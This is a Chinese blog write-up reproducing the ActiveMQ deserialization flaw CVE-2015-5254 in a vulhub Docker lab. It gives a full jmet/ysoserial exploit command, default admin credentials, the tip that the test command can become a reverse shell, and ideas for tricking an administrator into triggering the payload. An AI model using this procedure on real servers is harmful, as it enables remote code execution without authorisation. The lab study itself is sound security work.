【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

CVE-2015-5254_ActiveMQ反序列化漏洞复现

0x01漏洞背景

ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

0x02环境搭建

vulhub的docker环境搭建

在/vulhub/activemq/CVE-2015-5254目录下运行

docker-compose up -d

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

环境运行后,将监听61616和8161两个端口

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

其中61616是工作端口,消息在这个端口进行传递,8161是Web管理页面端口

访问http://ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

0x03漏洞复现

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

Ps: ysoserial集合了各种java反序列化payload的工具,下载地址 https://github.com/frohoff/ysoserial

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 目标IP 61616

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:你的IP/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:密码是admin/admin

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

点击查看这条消息即可触发命令执行,此时进入容器docker-compose exec activemq bash(需要在/vulhub/activemq/CVE-2015-5254下执行),可见/tmp/success已成功创建,说明漏洞利用成功:

【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

该漏洞可将命令替换成弹shell语句再次利用

0x04总结

值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。【安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现

上一篇:蓝牙新漏洞为攻击者穿上隐形衣


下一篇:CVE-2021-1675漏洞复现